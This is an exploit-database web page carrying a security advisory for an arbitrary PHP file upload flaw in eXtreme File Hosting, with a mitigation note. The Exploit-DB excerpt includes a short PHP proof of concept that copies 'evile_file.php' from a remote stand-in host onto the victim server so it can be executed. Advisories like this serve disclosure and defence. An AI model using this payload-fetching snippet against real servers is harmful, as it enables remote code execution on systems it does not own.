Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary File Upload Vulnerability in eXtreme File Hosting - exploit.company
header-logo
Suggest Exploit
vendor:
eXtreme File Hosting
by:
9.8
CVSS
CRITICAL
Arbitrary File Upload
434
CWE
Product Name: eXtreme File Hosting
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary File Upload Vulnerability in eXtreme File Hosting

The eXtreme File Hosting application fails to sufficiently sanitize user-supplied input, allowing an attacker to upload and execute arbitrary PHP script code in the context of the affected webserver process. This can lead to the compromise of the application and enable other possible attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to implement strict input validation and file-upload restrictions. Additionally, the web application should properly sanitize user-supplied input to prevent code execution.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22498/info

eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context of the affected webserver process. This may help the attacker compromise the application; other attacks are possible. 

<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}

Navigation

Suggest Exploit

Services By CQR